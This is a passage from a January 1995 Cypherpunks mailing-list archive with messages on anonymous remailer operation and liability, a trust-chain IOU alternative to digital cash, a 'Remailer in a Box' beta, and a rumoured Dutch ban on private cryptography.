-- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From greg at ideath.goldenbear.com Fri Jan 20 23:44:39 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Fri, 20 Jan 95 23:44:39 PST Subject: Remailers-in-a-box In-Reply-To: <199501210301.TAA09022@netcom14.netcom.com> Message-ID: <199501210401.AA02848@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- > I don't think "disingenuous" as very apt description. For one thing, > my proposal certainly doesn't make things any _worse_ for the true > remailers. Sorry if I was unclear; I didn't mean that you were being disingenuous, just that the assignment of responsibility/culpability in at least some of the schemes being discussed looks suspect to me. I do think that this plan can create greater risk for the owners of machines which operate remailers - what if one of their customers decides not to block traffic to whitehouse.gov, or to alt.religion.copyright, or whatever? Neither the SPA nor the Secret Service has acted particularly cluefully with respect to seizing hardware or conducting unnanounced destructive "fishing" expeditions. As things stand today, I have some control (via my filter list) of the risks I'm willing to assume and not assume. If I let people with no real stake in the matter gamble with my machine based on their own choices about filtering, that looks like a loss to me. (Of course, the machine owner can always, via contract, set certain terms - e.g., addresses which must be filtered. This starts to look like active participation in the administration of the remailer, which makes the off-site operator structure seem less legitimate.) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLyCGan3YhjZY3fMNAQFpbwQAj/PSC5e2IxCpuxaLMXi/vX2DsJp6q8x0 LzKrI57AjujC07o7vHGHlhPZIgWC7hTgNxAy3wRNOqRDwb7FdX6GQfMM4aWmbU4U 1pypD5eipO3CgkaHm5VqpKnVdDmxFQ3r6tDY1qV8jV0ghnku9DpmHhQIr4C+U1Cx krBo2FThMRo= =qguX -----END PGP SIGNATURE----- From nowhere at bsu-cs.bsu.edu Sat Jan 21 00:09:44 1995 From: nowhere at bsu-cs.bsu.edu (Anonymous) Date: Sat, 21 Jan 95 00:09:44 PST Subject: Why emoney? Why not a web of debt? Message-ID: <199501210809.DAA12896@bsu-cs.bsu.edu> > Date: Fri, 20 Jan 1995 19:36:34 -0500 > From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) > > Certainly, that's what money is after all. Pretty much. But how are you > going to transfer these IOUs electronically in a way that is relatively > fraud-proof? [...] By only trading with trusted partners. Read on... > And of course, if you want to use these certificates of value anonymously, > which is what is required to pay for an anon remailer, there are some > slightly more stringent requirements. The right kind of ecash protocol can > still handle it. But Carol probably shouldn't be paying for a remailer in > CarolBucks (or CarolIOUs, whatever), at least not unless Carol is such a > big spender that CarolBucks are in wide circulation and used by lots of > people other then Carol. Which I guess is possible in your system. If the remailer operator trusts Carol, then Carol and the Op can exchange Op-IOU's for money, or Carol-IOU's for Op-IOU's. (This is the base case of the induction for you math geeks.) Carol can use the Op-IOU's directly with the Op or 'sell' them to people who want to do business with the Op. If the remailer operator doesn't trust Carol, but there is a chain of trust from Carol to the remailer operator, then Carol can get IOUs from someone which the remailer operator does trust. Call them Jo-IOUs. To do this Carol asks Pat who asks ... who asks Jo for an IOU worth $32. Carol gives Pat a Carol-IOU worth $32(+transaction fee is Pat is a greedy sole) in exchange for which Pat gives Carol the Jo-IOU worth $32 (which Carol got from Pat (which Pat got from some place only Pat knows for sure)). IOU swaps will probably be done under the cover of encryption. Swaps can also be done with a nice ecash system like Chaum and Brandt(sp?) have proposed. But I am not sure it is required. Anonymity can come also from the chain of IOU swaps, in the same way remailers produce anonymity -- each person neglects to tell any others for whom they carry out IOU swaps. Sure Pat knows Carol wants a Jo IOU, but Pat doesn't know why. Jo could figure out that Jo's IOU went out to W.Smith, and came back from V.Jones but can't make any conclusion about weather W. and V. are trading partners or not. It would take a conspiracy of each person along the swap path to expose the real trade. Alternatively the buyer or seller can out the transaction. (But suppose they only know each other via some anonymous email pool...) And privacy (from other than your trading partners) comes from using encryption during each IOU swap. But if you don't trust your trading partners enough to keep quiet about who you are, by all means use an untraceable ecash system. (There are other advantages to using blind signatures anyway.) > A pseudo-anarchist non-state-supported debt system would work fine, but you > still need a mechanism to transfer your certificates of value, whether they Well... TackyTokens, and a little bit (ha!) of client code (start with Sameer's?) ought to do the trick. (So perhaps the original message's subject ought to have been "Why Ebanks? Why not a web of debt-trust?" since it is the central bank I am avoiding here. Not tacky tokens.) But it isn't really necesary. Read on... > [...] There are advantages and disadvantages to that > sort of thing, and it might be something interesting to think about, but One problem with getting an ecash system off the ground is making the tokens worth moeny. The advantage of a distributed web-of- debt/trust model is that I only need to trade IOUs for US$ with a few trusted friends. I don't need to go to any kind of central bank. No central bank means no central point to be attacked with guns, hacks, or taxes. No central bank means no credit card numbers, money orders, or green backs mailed away to strangers. Another cool thing, and the reason you don't need Chaumian digital cash, is that the only people you can steal from (or who can steal from you) are your trusted friends! If I pass a bogus token in exchange for a real IOU, then I just ripped off my friend. The only place two non-friends interface is at the final buyer-seller interface. If the seller refuses to honor the token, the buyer can ask the friend who gave it to them for a refund, who can ask for a refund from ... until the token gets back to the thief. The thief can either steal from their friend by refusing the refund, or infact honor the bogus token, and eat the loss (if any). One bad thing is anyone can deny service to people by passing bogus tokens, and then refunding them. Lukily the friends of the blocker will notice that when getting tokens through that person, the number of refunds is higher than average. In that case, the blocker can be removed from lists of their friends, and cut out of the economy. Denial of service can be prevented another way too -- but it does require Chaumian blind signatures. Instead of trading a Carol-IOU for any old Jo-IOU, Carol might demand a Jo-IOU which is a signature on a particular (blinded) secret number. Just as if Carol were doing a TackyToken protocol exchange directly with Jo. If Carol gets a thing from Pat which isn't signed by Jo, Carol complains to Pat. If Carol gets a thing which un-blinded isn't a signature by Jo of Carol's secret number, Carol again complains to Pat. Symbolically: instead of a <-> b, then b <-> c, then ... y <-> z; do a -> via b -> via c ... via y -> z signs -> via y ... via b -> to a. The disadvantage is that Pr0duct Cypher's Tacky Token code would need to be hacked a bit more. And then there is the nasty old issue of algorithm patents. Noyb From skaplin at mirage.skypoint.com Sat Jan 21 00:36:26 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Sat, 21 Jan 95 00:36:26 PST Subject: Remailer In a Box available for beta testing In-Reply-To: <199501210142.RAA28133@soda.CSUA.Berkeley.EDU> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199501210142.RAA28133 at soda.CSUA.Berkeley.EDU>, you wrote: > (Sameer uses PGP) > 3) If you wish, you can setup a .forward file to point to mailfilters > or to another account. > > 4) Run the program /usr/local/lib/boxed-remailer/install_remail. The > remailer will be installed, and non-remailed mail will be acted upon > according to how the account was setup before you ran the program. > > 5) Answer the questions, they should be pretty simple. > > Once an account is created there is a one week free grace period. > If you'd like to continue the account you can pay for it. > > If you have problems and suggestions, make sure you mail me, and > I'll fix it. This is still in beta testing, so if you have problems I won't > disable the account waiting for payment until the problems are fixed. > One minor question, is it possible to set it up so that it is not a final hop remailer. In other words the remailer is set up to pass its mail on to another remailer which is the final destination (preferably non-U.S.) If so, I'm in. I've already got my account on c2 doing three things, what's one more. If we could make this possible, it could really propagate remailers as it removes some of the liability from those who can't afford it. I would love to run a final hop remailer, unfortunately financially I barely have enough cash to keep on the net, let alone pay for a lawyer if needed. Hopefully this is only temporary, (wifey finally found a job, now it's catch-up time) but I'm unfortunately getting used to it. Sam - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== Any two philosophers can tell each other all they know in two hours. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLyDF38lnXxBRSgfNAQG95gf9GHzDj4NYoMe+mwms8kbeVEpDIZo6gI2u 0CnmGQ6QgHPloUim53cHeJXO/wockD7ofRy/OiN0ohbCk51R7MJ2mpgC1VMZRy1h PYz+HILjTxI4Ejkf7JFWiaDl9YBiXJojdkkyLvqHIGvz2v/jgY45zaR9jyhwDQYf 1qxZmzi9S2VvHa+e4KJ99tG/+4C/b92W5KtQPd3P/+N1dUHzWhiBkQTxi2Sbj/DW GkS4O5qwGQS7FXIEN880HJzIExLTSg3UgbmkRPNo9yyETvco/XBYTpzTefVPNUC9 rCW/pgl8GpJtYIsXYn65j0p1xWUTjYvTpXFyXvXjBr1eFF/IVHJ4gQ== =bV0h -----END PGP SIGNATURE----- From usura at vox.xs4all.nl Sat Jan 21 03:02:59 1995 From: usura at vox.xs4all.nl (Alex de Joode) Date: Sat, 21 Jan 95 03:02:59 PST Subject: The Remailer Crisis Message-ID: jalicqui at prairienet.org (Jeff Licquia) writes: : Would it be better if you didn't have to dedicate your box to Linux, but : just ran it every so often when you weren't playing with Codewright? If you : had some store-and-forward mail system (like UUCP or Fido), you wouldn't : need to say goodbye to DOS/Windows. Patrick Oonk has written a remailer for Waffle, (wich is an UUCP system), I use that for vox.xs4ll.nl . Is works under DOS. Regards, Alex de Joode usura at replay.com http://xs4all.nl/~usura From carolb at barton.spring.com Sat Jan 21 03:12:26 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Sat, 21 Jan 95 03:12:26 PST Subject: [pagre@weber.ucsd.edu: Supreme Court decision on anonymity] In-Reply-To: <9501181647.AA13819@toast> Message-ID: Thanks for the enlightening article. Whenever I start the remailer, now, I won't be so afraid.Love Always, Carol Anne ps It too will be on a c2.org type www page type format. RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From usura at replay.com Sat Jan 21 03:52:49 1995 From: usura at replay.com (Alex de Joode) Date: Sat, 21 Jan 95 03:52:49 PST Subject: Netherlands crypto ban? Message-ID: <199501211152.AA05246@xs1.xs4all.nl> In article you stated: : What's the update on the move to ban private crypto in Holland? : Last I remember there were trial balloons, but nothing happened. The proposed ban came from the former fundamentalist christian led department of justice. Since the elections the political landscape has been changed, the christian democratic party has been removed, we now have Liberals (something like Republicans in the US :) ), Socialists and Social Democrats in power. Law Enforcement has come under public scrutiny, since special police teams used unlawful tactics to get criminal organizations out of their business. They broke into Warehouses to see if narcotics were depostid there (without a warrant), they made up reports and lied in court. The new head of the justice department, already has dropped some policies that were in place, and she just announced that due to the rise in competence of the LEA the rights a suspect has also have to be raised in order to compensate it. She swiftly killed of any opposition the LEA had against that proposal. In my opinion, The Netherlands will not adopt a crypto policy on their own, the'll do it if the EC proposes such a "thing". -- Alex de Joode usura at replay.com Hate mail appreciated, http://www.xs4all.nl/~usura weekly contest for best death threat. From carolb at barton.spring.com Sat Jan 21 04:07:47 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Sat, 21 Jan 95 04:07:47 PST Subject: Linux Remailer Volunteer (Re:The remailer crisis) In-Reply-To: <199501191847.KAA28985@netcom15.netcom.com> Message-ID:

Volunteering

As the Tired, Poor, Project gets it's next machines ready for their next recipients, I will be able to finally upgrade to a 386, and pass this 8088, to the next recipient down the line. (yeah!) I would volunteer to be your pre-alpha tester. I know that if I could run it anybody could be taught to run it. For I would always be grateful in learning how it was done in the first place, and will always help those farther down the line than me.